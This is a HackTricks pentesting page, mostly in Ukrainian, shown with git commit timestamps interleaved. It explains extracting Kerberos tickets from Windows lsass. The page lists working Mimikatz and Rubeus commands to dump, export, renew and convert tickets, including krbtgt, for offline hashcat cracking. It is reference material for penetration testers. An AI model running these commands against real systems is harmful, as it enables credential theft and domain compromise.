hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md

65 lines
5 KiB
Markdown
Raw Normal View History

# Harvesting tickets from Windows
2022-04-28 16:01:33 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
<details>
2022-04-28 16:01:33 +00:00
<summary>Support HackTricks</summary>
2022-04-28 16:01:33 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
{% endhint %}
2022-04-28 16:01:33 +00:00
Квитки в Windows керуються та зберігаються процесом **lsass** (Служба підсистеми локальної безпеки), відповідальним за обробку політик безпеки. Щоб витягти ці квитки, необхідно взаємодіяти з процесом lsass. Користувач без прав адміністратора може отримати доступ лише до своїх власних квитків, тоді як адміністратор має привілей витягувати всі квитки в системі. Для таких операцій широко використовуються інструменти **Mimikatz** та **Rubeus**, кожен з яких пропонує різні команди та функціональність.
2024-02-05 02:28:59 +00:00
### Mimikatz
Mimikatz - це універсальний інструмент, який може взаємодіяти з безпекою Windows. Його використовують не лише для витягування квитків, але й для різних інших операцій, пов'язаних із безпекою.
2022-08-13 23:06:40 +00:00
```bash
2024-02-05 02:28:59 +00:00
# Extracting tickets using Mimikatz
2022-08-13 23:06:40 +00:00
sekurlsa::tickets /export
2024-02-05 02:28:59 +00:00
```
### Rubeus
Rubeus - це інструмент, спеціально розроблений для взаємодії та маніпуляцій з Kerberos. Він використовується для витягування та обробки квитків, а також для інших дій, пов'язаних з Kerberos.
2024-02-05 02:28:59 +00:00
```bash
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
2024-02-05 02:28:59 +00:00
# Listing all tickets
2022-08-13 23:06:40 +00:00
.\Rubeus.exe triage
2024-02-05 02:28:59 +00:00
# Dumping a specific ticket by LUID
2022-08-13 23:06:40 +00:00
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
2024-02-05 02:28:59 +00:00
# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>
# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
2022-08-13 23:06:40 +00:00
```
Коли ви використовуєте ці команди, переконайтеся, що замінили заповнювачі, такі як `<BASE64_TICKET>` та `<luid>`, на фактичний закодований у Base64 квиток та ідентифікатор входу відповідно. Ці інструменти надають розширену функціональність для управління квитками та взаємодії з механізмами безпеки Windows.
2022-04-28 16:01:33 +00:00
## References
2024-02-08 21:36:15 +00:00
* [https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
2022-04-28 16:01:33 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
<details>
2022-04-28 16:01:33 +00:00
<summary>Support HackTricks</summary>
2022-04-28 16:01:33 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
{% endhint %}